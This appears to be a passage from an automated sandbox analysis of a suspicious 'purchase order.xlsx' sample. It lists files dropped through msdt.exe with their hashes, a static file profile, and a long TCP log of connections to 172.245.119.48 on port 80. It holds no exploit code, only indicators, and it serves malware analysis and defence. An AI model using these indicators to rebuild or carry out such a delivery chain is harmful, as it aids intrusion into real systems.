                                                                                                                                                                                            Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\en-US\DiagPackage.dll.mui

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):10752
                                                                                                                                                                                            Entropy (8bit):3.517898352371806
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                                            MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                                            SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                                            SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                                            SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                            C:\Windows\Temp\SDIAG_a15a10f3-1521-4839-a5a3-4e170a5f026c\result\results.xsl

                                                                                                                                                                                            Download File
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):48956
                                                                                                                                                                                            Entropy (8bit):5.103589775370961
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                                            MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                                            SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                                            SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                                            SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="

                                                                                                                                                                                            Static File Info

                                                                                                                                                                                            General

                                                                                                                                                                                            File type:CDFV2 Encrypted
                                                                                                                                                                                            Entropy (8bit):7.868306503118196
                                                                                                                                                                                            TrID:
                                                                                                                                                                                            • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                                                            File name:purchase order.xlsx
                                                                                                                                                                                            File size:72696
                                                                                                                                                                                            MD5:a8930c1fcd80e9965ae26446afb717f6
                                                                                                                                                                                            SHA1:0cbf04bf7fc8522ab983f0246357fa70a85ee56b
                                                                                                                                                                                            SHA256:c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
                                                                                                                                                                                            SHA512:ead35c97bfccb344ed5837e82e1f648e518c52a1c6c67bd6511e018b4dc2d1364ae1f6b7ddad69f02e58aa417402327ac3e36f175220c2c6f72fc01d4758b77f
                                                                                                                                                                                            SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
                                                                                                                                                                                            TLSH:2C63D08237AB691BCC12093CD51142471E780F5869A8697BACC9B30F487D7CFED53AAD
                                                                                                                                                                                            File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                            File Icon

                                                                                                                                                                                            Icon Hash:74ecd0d2d6d6d0dc

                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                            Jun 28, 2022 10:45:23.336363077 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.451755047 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.451863050 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.452174902 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572532892 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572566032 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572590113 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572613955 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572635889 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572658062 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572679996 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572694063 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572701931 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572726965 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572750092 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.572783947 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.574032068 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.574116945 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689332962 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689361095 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689382076 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689399004 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689419985 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689430952 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689441919 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689459085 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689480066 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:23.689503908 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:45:29.079606056 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:45:29.079698086 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:19.438086033 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:19.556322098 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.520191908 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.635241032 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.635344028 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.635595083 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757875919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757917881 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757942915 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757967949 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.757992029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758012056 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758013964 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758039951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758063078 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758064985 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758090019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758090973 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758115053 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758147001 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.758224964 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874607086 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874644041 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874670029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874687910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874696970 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874725103 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874726057 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874751091 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874774933 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874777079 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874799967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874809980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874826908 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874852896 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874854088 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874878883 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874886036 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874903917 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874927044 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874929905 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874954939 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874958992 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874979019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.874984980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875004053 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875010967 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875029087 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875039101 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875055075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875080109 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875080109 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875104904 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875129938 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.875166893 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990305901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990358114 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990386009 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990408897 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990433931 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990457058 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990459919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990483999 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990509033 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990520954 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990533113 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990555048 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990556955 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990578890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990602970 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990605116 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990629911 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990653038 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990654945 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990679026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990683079 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990705013 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990730047 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990730047 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990755081 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990761995 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990778923 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990802050 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990803003 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990828991 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990842104 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990854979 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990879059 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990880013 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990902901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990925074 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990926981 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990950108 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990951061 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990976095 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990998030 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.990999937 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991024971 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991029978 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991049051 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991071939 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991072893 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991099119 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991100073 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991122961 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991147041 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991147041 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991173029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991199017 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991199017 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991221905 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991225004 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991250992 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991260052 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991276026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991300106 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991302967 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991326094 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:37.991363049 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109687090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109730959 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109751940 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109757900 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109771967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109788895 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109791040 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109810114 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109831095 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109831095 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109855890 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109874010 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109877110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109896898 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109898090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109918118 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109936953 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109956026 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109956026 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109978914 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109980106 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.109999895 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110006094 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110018969 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110038996 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110048056 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110059023 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110086918 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110111952 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110162020 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110179901 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110198021 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110217094 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110219955 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110238075 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110256910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110260963 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110280037 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110281944 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110299110 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110318899 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110321045 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110337019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110356092 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110358000 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110374928 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110383987 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110398054 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110418081 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110424042 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110438108 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110456944 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110460997 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110476017 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110486031 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110495090 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110513926 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110522032 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110538006 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110557079 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110563993 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110575914 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                                                            Jun 28, 2022 10:46:38.110593081 CEST4978380192.168.2.4172.245.119.48
